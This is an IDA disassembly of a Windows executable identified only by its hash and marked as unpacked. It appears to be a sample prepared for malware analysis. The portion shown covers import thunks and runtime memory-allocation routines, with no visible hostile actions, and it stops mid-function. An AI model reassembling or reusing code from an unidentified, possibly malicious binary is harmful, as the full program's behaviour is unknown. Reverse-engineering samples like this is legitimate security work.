;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 48128671A8ACD8CFD6450EF1880F704A
; File Name : u:\work\48128671a8acd8cfd6450ef1880f704a_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000042F8 ( 17144.)
; Section size in file : 000042F8 ( 17144.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401000 proc near ; CODE XREF: sub_403394+39�p
; sub_403394+54�p
jmp ds:dword_4080F8
sub_401000 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401008 proc near ; CODE XREF: sub_402D70+14�p
; sub_402D8C+16�p ...
jmp ds:dword_4080F4
sub_401008 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401010 proc near ; CODE XREF: sub_4031E8-2B6�p
; CODE:00403140�p
; DATA XREF: ...
jmp ds:dword_4080F0
sub_401010 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401018 proc near ; CODE XREF: sub_4031E8-31E�p
; sub_4031E8-2E1�p ...
jmp ds:dword_4080EC
sub_401018 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401020 proc near ; CODE XREF: sub_403394+3F�p
; sub_403394+5A�p
jmp ds:dword_4080E8
sub_401020 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401028 proc near ; CODE XREF: sub_402920+19�p
; sub_402920+55�p ...
jmp ds:dword_408108
sub_401028 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401030 proc near ; CODE XREF: sub_403420+C3�p
jmp ds:dword_4080E4
sub_401030 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401038 proc near ; CODE XREF: sub_403394+78�p
jmp ds:dword_408104
sub_401038 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401040 proc near ; CODE XREF: sub_403420+8B�p
jmp ds:dword_4080E0
sub_401040 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401048 proc near ; CODE XREF: sub_402A84:loc_402ABB�p
; sub_403AE4+67�p
jmp ds:dword_4080DC
sub_401048 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401050 proc near ; CODE XREF: sub_403A1C+26�p
jmp ds:dword_4080D8
sub_401050 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401058 proc near ; CODE XREF: sub_402A84+23�p
jmp ds:dword_4080D4
sub_401058 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401060 proc near ; CODE XREF: sub_4010B0+A�p
jmp ds:dword_4080D0
sub_401060 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401068 proc near ; CODE XREF: sub_403AE4:loc_403B8C�p
; sub_403AE4:loc_403B9D�p
jmp ds:dword_4080CC
sub_401068 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401070 proc near ; CODE XREF: sub_40360C+12�p
jmp ds:dword_4080C8
sub_401070 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401078 proc near ; CODE XREF: sub_402C94+6B�p
jmp ds:dword_408118
sub_401078 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401080 proc near ; CODE XREF: sub_402C94+22�p
jmp ds:dword_408114
sub_401080 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401088 proc near ; CODE XREF: sub_402C94+55�p
jmp ds:dword_408110
sub_401088 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401090 proc near ; CODE XREF: sub_4037A0+7�p
; sub_40386C+B�p
jmp ds:dword_408124
sub_401090 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401098 proc near ; CODE XREF: sub_4037B8+7�p
; sub_4037C8+E�p ...
jmp ds:dword_408120
sub_401098 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A0 proc near ; CODE XREF: sub_403AE4:loc_403BAC�p
jmp ds:dword_4080C4
sub_4010A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A8 proc near ; CODE XREF: sub_403AE4+7B�p
; sub_403AE4+8C�p
jmp ds:dword_4080C0
sub_4010A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4010B0 proc near ; CODE XREF: sub_403AE4+71�p
var_1C = word ptr -1Ch
var_18 = word ptr -18h
push ebx
add esp, 0FFFFFFBCh
mov ebx, 0Ah
push esp
call sub_401060 ; GetStartupInfoA
test byte ptr [esp+48h+var_1C], 1
jz short loc_4010CB
movzx ebx, [esp+48h+var_18]
loc_4010CB: ; CODE XREF: sub_4010B0+14�j
mov eax, ebx
add esp, 44h
pop ebx
retn
sub_4010B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D4 proc near ; CODE XREF: sub_401114+15�p
; sub_40191C+54�p
jmp ds:dword_4080BC
sub_4010D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010DC proc near ; CODE XREF: sub_4019F4+41�p
; sub_4019F4+B6�p
jmp ds:dword_4080B8
sub_4010DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E4 proc near ; CODE XREF: sub_40137C+2F�p
; sub_4013E0+1E�p ...
jmp ds:dword_4080B4
sub_4010E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010EC proc near ; CODE XREF: sub_40137C+56�p
; sub_4013E0+69�p ...
jmp ds:dword_4080B0
sub_4010EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F4 proc near ; CODE XREF: sub_40191C+17�p
jmp ds:dword_4080AC
sub_4010F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010FC proc near ; CODE XREF: sub_40191C+2A�p
; sub_4019F4+2F�p ...
jmp ds:dword_4080A8
sub_4010FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401104 proc near ; CODE XREF: sub_40191C+C2�p
; sub_4019F4+E4�p ...
jmp ds:dword_4080A4
sub_401104 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40110C proc near ; CODE XREF: sub_4019F4+EE�p
jmp ds:dword_4080A0
sub_40110C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401114 proc near ; CODE XREF: sub_4011A0+9�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFF4h
mov ebx, offset dword_4075D0
cmp dword ptr [ebx], 0
jnz short loc_40117B
push 644h
push 0
call sub_4010D4 ; LocalAlloc
mov [esp+10h+var_8], eax
cmp [esp+10h+var_8], 0
jnz short loc_401140
xor eax, eax
mov [esp+10h+var_10], eax
jmp short loc_401190
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_401114+23�j
mov eax, [esp+10h+var_8]
mov edx, ds:dword_4075CC
mov [eax], edx
mov eax, [esp+10h+var_8]
mov ds:dword_4075CC, eax
xor eax, eax
loc_401157: ; CODE XREF: sub_401114+65�j
mov edx, eax
add edx, edx
mov ecx, [esp+10h+var_8]
lea edx, [ecx+edx*8+4]
mov [esp+10h+var_C], edx
mov edx, [esp+10h+var_C]
mov ecx, [ebx]
mov [edx], ecx
mov edx, [esp+10h+var_C]
mov [ebx], edx
inc eax
cmp eax, 64h
jnz short loc_401157
loc_40117B: ; CODE XREF: sub_401114+C�j
mov eax, [ebx]
mov [esp+10h+var_C], eax
mov eax, [esp+10h+var_C]
mov eax, [eax]
mov [ebx], eax
mov eax, [esp+10h+var_C]
mov [esp+10h+var_10], eax
loc_401190: ; CODE XREF: sub_401114+2A�j
mov eax, [esp+10h+var_10]
add esp, 0Ch
pop ebx
retn
sub_401114 endp
; =============== S U B R O U T I N E =======================================
sub_401198 proc near ; CODE XREF: sub_40191C+34�p
; sub_40191C+3E�p ...
mov [eax], eax
mov [eax+4], eax
retn
sub_401198 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011A0 proc near ; CODE XREF: sub_401230+71�p
; sub_4012B8+96�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
call sub_401114
mov [esp+10h+var_C], eax
cmp [esp+10h+var_C], 0
jnz short loc_4011BD
xor eax, eax
jmp short loc_4011F7
; ---------------------------------------------------------------------------
loc_4011BD: ; CODE XREF: sub_4011A0+17�j
mov eax, [esi]
mov edx, [esp+10h+var_C]
mov [edx+8], eax
mov eax, [esi+4]
mov edx, [esp+10h+var_C]
mov [edx+0Ch], eax
mov eax, [ebx]
mov [esp+10h+var_10], eax
mov eax, [esp+10h+var_C]
mov edx, [esp+10h+var_10]
mov [eax], edx
mov eax, [esp+10h+var_C]
mov [eax+4], ebx
mov eax, [esp+10h+var_10]
mov edx, [esp+10h+var_C]
mov [eax+4], edx
mov eax, [esp+10h+var_C]
mov [ebx], eax
mov al, 1
loc_4011F7: ; CODE XREF: sub_4011A0+1B�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_4011A0 endp
; =============== S U B R O U T I N E =======================================
sub_4011FC proc near ; CODE XREF: sub_401230+37�p
; sub_401230+56�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
add esp, 0FFFFFFF8h
mov edx, [eax+4]
mov [esp+8+var_8], edx
mov edx, [eax]
mov [esp+8+var_4], edx
mov edx, [esp+8+var_8]
mov ecx, [esp+8+var_4]
mov [edx], ecx
mov edx, [esp+8+var_4]
mov ecx, [esp+8+var_8]
mov [edx+4], ecx
mov edx, ds:dword_4075D0
mov [eax], edx
mov ds:dword_4075D0, eax
pop ecx
pop edx
retn
sub_4011FC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401230 proc near ; CODE XREF: sub_40169C+80�p
; sub_401744+78�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebx, ecx
mov esi, eax
mov edi, esp
mov eax, [esi]
mov [edi], eax
mov eax, [edx]
mov [ebx], eax
mov eax, [edx+4]
mov [ebx+4], eax
loc_40124B: ; CODE XREF: sub_401230+6B�j
mov eax, [edi]
mov eax, [eax]
mov [esp+18h+var_14], eax
mov edx, [edi]
mov edx, [edx+8]
mov ecx, edx
mov ebp, [edi]
add ecx, [ebp+0Ch]
mov eax, [ebx]
cmp ecx, eax
jnz short loc_40127D
mov eax, [edi]
call sub_4011FC
mov eax, [edi]
mov eax, [eax+8]
mov [ebx], eax
mov eax, [edi]
mov eax, [eax+0Ch]
add [ebx+4], eax
jmp short loc_401293
; ---------------------------------------------------------------------------
loc_40127D: ; CODE XREF: sub_401230+33�j
add eax, [ebx+4]
cmp edx, eax
jnz short loc_401293
mov eax, [edi]
call sub_4011FC
mov eax, [edi]
mov eax, [eax+0Ch]
add [ebx+4], eax
loc_401293: ; CODE XREF: sub_401230+4B�j
; sub_401230+52�j
mov eax, [esp+18h+var_14]
mov [edi], eax
cmp esi, [edi]
jnz short loc_40124B
mov edx, ebx
mov eax, esi
call sub_4011A0
test al, al
jnz short loc_4012AE
xor eax, eax
mov [ebx], eax
loc_4012AE: ; CODE XREF: sub_401230+78�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401230 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4012B8 proc near ; CODE XREF: sub_401888+82�p
; sub_401D0C+AB�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF0h
mov [esp+20h+var_20], eax
mov esi, esp
mov eax, [esi]
mov [esp+20h+var_14], eax
loc_4012CA: ; CODE XREF: sub_4012B8+B3�j
mov ecx, [edx]
mov eax, [esi]
mov eax, [eax+8]
cmp ecx, eax
jb loc_40135F
mov ebx, eax
mov edi, [esi]
add ebx, [edi+0Ch]
mov edi, ecx
add edi, [edx+4]
cmp ebx, edi
jb short loc_40135F
cmp ecx, eax
jnz short loc_40130E
mov eax, [edx+4]
mov ecx, [esi]
add [ecx+8], eax
mov eax, [edx+4]
mov edx, [esi]
sub [edx+0Ch], eax
mov eax, [esi]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40135B
mov eax, [esi]
call sub_4011FC
jmp short loc_40135B
; ---------------------------------------------------------------------------
loc_40130E: ; CODE XREF: sub_4012B8+33�j
mov ebx, eax
mov edi, [esi]
add ebx, [edi+0Ch]
mov edi, ecx
add edi, [edx+4]
cmp ebx, edi
jnz short loc_401328
mov eax, [edx+4]
mov edx, [esi]
sub [edx+0Ch], eax
jmp short loc_40135B
; ---------------------------------------------------------------------------
loc_401328: ; CODE XREF: sub_4012B8+64�j
mov ebx, [edx]
add ebx, [edx+4]
mov [esp+20h+var_1C], ebx
mov edi, [esi]
mov edi, [edi+8]
mov ebp, [esi]
add edi, [ebp+0Ch]
sub edi, ebx
mov [esp+20h+var_18], edi
sub ecx, eax
mov eax, [esi]
mov [eax+0Ch], ecx
lea edx, [esp+20h+var_1C]
mov eax, [esi]
call sub_4011A0
test al, al
jnz short loc_40135B
xor eax, eax
jmp short loc_401373
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_4012B8+4B�j
; sub_4012B8+54�j ...
mov al, 1
jmp short loc_401373
; ---------------------------------------------------------------------------
loc_40135F: ; CODE XREF: sub_4012B8+1B�j
; sub_4012B8+2F�j
mov eax, [esi]
mov eax, [eax]
mov [esi], eax
mov eax, [esi]
cmp eax, [esp+20h+var_14]
jnz loc_4012CA
xor eax, eax
loc_401373: ; CODE XREF: sub_4012B8+A1�j
; sub_4012B8+A5�j
add esp, 10h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4012B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40137C proc near ; CODE XREF: sub_40169C+6E�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
cmp esi, 100000h
jge short loc_401392
mov esi, 100000h
jmp short loc_40139E
; ---------------------------------------------------------------------------
loc_401392: ; CODE XREF: sub_40137C+D�j
add esi, 0FFFFh
and esi, 0FFFF0000h
loc_40139E: ; CODE XREF: sub_40137C+14�j
mov [ebx+4], esi
push 1
push 2000h
push esi
push 0
call sub_4010E4 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jz short loc_4013DB
mov edx, ebx
mov eax, offset off_4075D4
call sub_4011A0
test al, al
jnz short loc_4013DB
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010EC ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_4013DB: ; CODE XREF: sub_40137C+3A�j
; sub_40137C+4A�j
pop edi
pop esi
pop ebx
retn
sub_40137C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4013E0 proc near ; CODE XREF: sub_401744+62�p
; sub_401744+A9�p
push ebx
push esi
push edi
push ebp
mov ebx, ecx
mov esi, edx
mov ebp, eax
mov dword ptr [ebx+4], 100000h
push 4
push 2000h
push 100000h
push ebp
call sub_4010E4 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jnz short loc_40142A
add esi, 0FFFFh
and esi, 0FFFF0000h
mov [ebx+4], esi
push 4
push 2000h
push esi
push ebp
call sub_4010E4 ; VirtualAlloc
mov [ebx], eax
loc_40142A: ; CODE XREF: sub_4013E0+29�j
cmp dword ptr [ebx], 0
jz short loc_401452
mov edx, ebx
mov eax, offset off_4075D4
call sub_4011A0
test al, al
jnz short loc_401452
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010EC ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_401452: ; CODE XREF: sub_4013E0+4D�j
; sub_4013E0+5D�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4013E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401458 proc near ; CODE XREF: sub_40169C+95�p
; sub_401744+90�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov edi, ecx
mov esi, esp
mov [esp+28h+var_20], 0FFFFFFFFh
xor ecx, ecx
mov [esp+28h+var_1C], ecx
mov [esp+28h+var_18], eax
add edx, [esp+28h+var_18]
mov [esp+28h+var_14], edx
mov eax, ds:off_4075D4
mov [esi], eax
jmp short loc_4014F1
; ---------------------------------------------------------------------------
loc_401486: ; CODE XREF: sub_401458+A0�j
mov eax, [esi]
mov eax, [eax]
mov [esp+28h+var_24], eax
mov eax, [esi]
mov ebx, [eax+8]
cmp ebx, [esp+28h+var_18]
jb short loc_4014EB
mov eax, ebx
mov edx, [esi]
add eax, [edx+0Ch]
cmp eax, [esp+28h+var_14]
ja short loc_4014EB
cmp ebx, [esp+28h+var_20]
jnb short loc_4014B0
mov [esp+28h+var_20], ebx
loc_4014B0: ; CODE XREF: sub_401458+52�j
mov eax, [esi]
mov ebp, [eax+8]
mov eax, [esi]
add ebp, [eax+0Ch]
cmp ebp, [esp+28h+var_1C]
jbe short loc_4014C4
mov [esp+28h+var_1C], ebp
loc_4014C4: ; CODE XREF: sub_401458+66�j
push 8000h
push 0
mov eax, [esi]
mov eax, [eax+8]
push eax
call sub_4010EC ; VirtualFree
test eax, eax
jnz short loc_4014E4
mov ds:dword_4075B0, 1
loc_4014E4: ; CODE XREF: sub_401458+80�j
mov eax, [esi]
call sub_4011FC
loc_4014EB: ; CODE XREF: sub_401458+3F�j
; sub_401458+4C�j
mov eax, [esp+28h+var_24]
mov [esi], eax
loc_4014F1: ; CODE XREF: sub_401458+2C�j
mov eax, offset off_4075D4
cmp eax, [esi]
jnz short loc_401486
xor eax, eax
mov [edi], eax
cmp [esp+28h+var_1C], 0
jz short loc_401516
mov eax, [esp+28h+var_20]
mov [edi], eax
mov eax, [esp+28h+var_1C]
sub eax, [esp+28h+var_20]
mov [edi+4], eax
loc_401516: ; CODE XREF: sub_401458+AB�j
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401458 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=18h
sub_401520 proc near ; CODE XREF: sub_40169C+35�p
; sub_401744+100�p
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov ebx, ecx
mov [esp+24h+var_3C], edx
lea esi, [esp+24h+var_34]
lea edi, [esp+24h+var_38]
lea ebp, [esp+0Ch]
mov edx, eax
mov ecx, edx
and ecx, 0FFFFF000h
mov [esp+24h+var_2C], ecx
add edx, [esp+24h+var_3C]
add edx, 0FFFh
and edx, 0FFFFF000h
mov [esp+24h+var_28], edx
mov eax, [esp+24h+var_2C]
mov [ebx], eax
mov eax, [esp+24h+var_28]
sub eax, [esp+24h+var_2C]
mov [ebx+4], eax
mov eax, ds:off_4075D4
mov [edi], eax
jmp short loc_4015CE
; ---------------------------------------------------------------------------
loc_401573: ; CODE XREF: sub_401520+B5�j
mov eax, [edi]
mov eax, [eax+8]
mov [esi], eax
mov eax, [edi]
mov eax, [eax+0Ch]
add eax, [esi]
mov [ebp+18h+var_18], eax
mov eax, [esi]
cmp eax, [esp+24h+var_2C]
jnb short loc_401592
mov eax, [esp+24h+var_2C]
mov [esi], eax
loc_401592: ; CODE XREF: sub_401520+6A�j
mov eax, [ebp+18h+var_18]
cmp eax, [esp+24h+var_28]
jbe short loc_4015A2
mov eax, [esp+24h+var_28]
mov [ebp+18h+var_18], eax
loc_4015A2: ; CODE XREF: sub_401520+79�j
mov eax, [esi]
cmp eax, [ebp+18h+var_18]
jnb short loc_4015C8
push 4
push 1000h
mov eax, [ebp+18h+var_18]
sub eax, [esi]
push eax
mov eax, [esi]
push eax
call sub_4010E4 ; VirtualAlloc
test eax, eax
jnz short loc_4015C8
xor eax, eax
mov [ebx], eax
jmp short loc_4015D7
; ---------------------------------------------------------------------------
loc_4015C8: ; CODE XREF: sub_401520+87�j
; sub_401520+A0�j
mov eax, [edi]
mov eax, [eax]
mov [edi], eax
loc_4015CE: ; CODE XREF: sub_401520+51�j
mov eax, offset off_4075D4
cmp eax, [edi]
jnz short loc_401573
loc_4015D7: ; CODE XREF: sub_401520+A6�j
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015E0 proc near ; CODE XREF: sub_401888+36�p
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov [esp+28h+var_28], edx
lea esi, [esp+28h+var_20]
lea edi, [esp+28h+var_24]
lea ebx, [esp+28h+var_1C]
mov edx, eax
mov ebp, edx
add ebp, 0FFFh
and ebp, 0FFFFF000h
mov [esp+28h+var_18], ebp
add edx, [esp+28h+var_28]
and edx, 0FFFFF000h
mov [esp+28h+var_14], edx
mov eax, [esp+28h+var_18]
mov [ecx], eax
mov eax, [esp+28h+var_14]
sub eax, [esp+28h+var_18]
mov [ecx+4], eax
mov eax, ds:off_4075D4
mov [edi], eax
jmp short loc_401689
; ---------------------------------------------------------------------------
loc_401631: ; CODE XREF: sub_4015E0+B0�j
mov eax, [edi]
mov eax, [eax+8]
mov [esi], eax
mov eax, [edi]
mov eax, [eax+0Ch]
add eax, [esi]
mov [ebx], eax
mov eax, [esi]
cmp eax, [esp+28h+var_18]
jnb short loc_40164F
mov eax, [esp+28h+var_18]
mov [esi], eax
loc_40164F: ; CODE XREF: sub_4015E0+67�j
mov eax, [ebx]
cmp eax, [esp+28h+var_14]
jbe short loc_40165D
mov eax, [esp+28h+var_14]
mov [ebx], eax
loc_40165D: ; CODE XREF: sub_4015E0+75�j
mov eax, [esi]
cmp eax, [ebx]
jnb short loc_401683
push 4000h
mov eax, [ebx]
sub eax, [esi]
push eax
mov eax, [esi]
push eax
call sub_4010EC ; VirtualFree
test eax, eax
jnz short loc_401683
mov ds:dword_4075B0, 2
loc_401683: ; CODE XREF: sub_4015E0+81�j
; sub_4015E0+97�j
mov eax, [edi]
mov eax, [eax]
mov [edi], eax
loc_401689: ; CODE XREF: sub_4015E0+4F�j
mov eax, offset off_4075D4
cmp eax, [edi]
jnz short loc_401631
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4015E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40169C proc near ; CODE XREF: sub_401F98+B�p
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov ebx, edx
mov esi, eax
mov edi, esp
mov ebp, offset off_4075E4
add esi, 3FFFh
and esi, 0FFFFC000h
loc_4016BA: ; CODE XREF: sub_40169C+8A�j
mov eax, [ebp+0]
mov [edi], eax
jmp short loc_401702
; ---------------------------------------------------------------------------
loc_4016C1: ; CODE XREF: sub_40169C+68�j
mov eax, [edi]
cmp esi, [eax+0Ch]
jg short loc_4016FC
mov ecx, ebx
mov eax, [edi]
mov eax, [eax+8]
mov edx, esi
call sub_401520
cmp dword ptr [ebx], 0
jz short loc_40173A
mov eax, [ebx+4]
mov edx, [edi]
add [edx+8], eax
mov eax, [ebx+4]
mov edx, [edi]
sub [edx+0Ch], eax
mov eax, [edi]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40173A
mov eax, [edi]
call sub_4011FC
jmp short loc_40173A
; ---------------------------------------------------------------------------
loc_4016FC: ; CODE XREF: sub_40169C+2A�j
mov eax, [edi]
mov eax, [eax]
mov [edi], eax
loc_401702: ; CODE XREF: sub_40169C+23�j
cmp ebp, [edi]
jnz short loc_4016C1
mov edx, ebx
mov eax, esi
call sub_40137C
cmp dword ptr [ebx], 0
jz short loc_40173A
lea ecx, [esp+1Ch+var_18]
mov edx, ebx
mov eax, ebp
call sub_401230
cmp [esp+1Ch+var_18], 0
jnz short loc_4016BA
lea ecx, [esp+1Ch+var_18]
mov edx, [ebx+4]
mov eax, [ebx]
call sub_401458
xor eax, eax
mov [ebx], eax
loc_40173A: ; CODE XREF: sub_40169C+3D�j
; sub_40169C+55�j ...
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40169C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401744 proc near ; CODE XREF: sub_401FC4+10�p
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov [esp+28h+var_28], ecx
mov edi, edx
mov ebx, eax
lea esi, [esp+28h+var_24]
mov ebp, offset off_4075E4
add edi, 3FFFh
and edi, 0FFFFC000h
loc_401767: ; CODE XREF: sub_401744+82�j
; sub_401744+C9�j
mov eax, [ebp+0]
mov [esi], eax
jmp short loc_401774
; ---------------------------------------------------------------------------
loc_40176E: ; CODE XREF: sub_401744+39�j
mov eax, [esi]
mov eax, [eax]
mov [esi], eax
loc_401774: ; CODE XREF: sub_401744+28�j
cmp ebp, [esi]
jz short loc_40177F
mov eax, [esi]
cmp ebx, [eax+8]
jnz short loc_40176E
loc_40177F: ; CODE XREF: sub_401744+32�j
mov eax, [esi]
cmp ebx, [eax+8]
jnz short loc_4017E5
mov eax, [esi]
cmp edi, [eax+0Ch]
jle loc_40182D
mov eax, [esi]
mov edx, edi
sub edx, [eax+0Ch]
mov eax, [esi]
mov eax, [eax+8]
mov ecx, [esi]
add eax, [ecx+0Ch]
lea ecx, [esp+28h+var_20]
call sub_4013E0
cmp [esp+28h+var_20], 0
jz short loc_4017E5
lea ecx, [esp+28h+var_18]
lea edx, [esp+28h+var_20]
mov eax, ebp
call sub_401230
cmp [esp+28h+var_18], 0
jnz short loc_401767
lea ecx, [esp+28h+var_18]
mov edx, [esp+28h+var_1C]
mov eax, [esp+28h+var_20]
call sub_401458
mov eax, [esp+28h+var_28]
xor edx, edx
mov [eax], edx
jmp loc_40187F
; ---------------------------------------------------------------------------
loc_4017E5: ; CODE XREF: sub_401744+40�j
; sub_401744+6C�j
lea ecx, [esp+28h+var_20]
mov edx, edi
mov eax, ebx
call sub_4013E0
cmp [esp+28h+var_20], 0
jz short loc_40182D
lea ecx, [esp+28h+var_18]
lea edx, [esp+28h+var_20]
mov eax, ebp
call sub_401230
cmp [esp+28h+var_18], 0
jnz loc_401767
lea ecx, [esp+28h+var_18]
mov edx, [esp+28h+var_1C]
mov eax, [esp+28h+var_20]
call sub_401458
mov eax, [esp+28h+var_28]
xor edx, edx
mov [eax], edx
jmp short loc_40187F
; ---------------------------------------------------------------------------
loc_40182D: ; CODE XREF: sub_401744+47�j
; sub_401744+B3�j
mov eax, [esi]
mov ebp, [eax+8]
cmp ebx, ebp
jnz short loc_401878
mov eax, [esi]
cmp edi, [eax+0Ch]
jg short loc_401878
mov ecx, [esp+28h+var_28]
mov eax, ebp
mov edx, edi
call sub_401520
mov eax, [esp+28h+var_28]
cmp dword ptr [eax], 0
jz short loc_40187F
mov eax, [esp+28h+var_28]
mov eax, [eax+4]
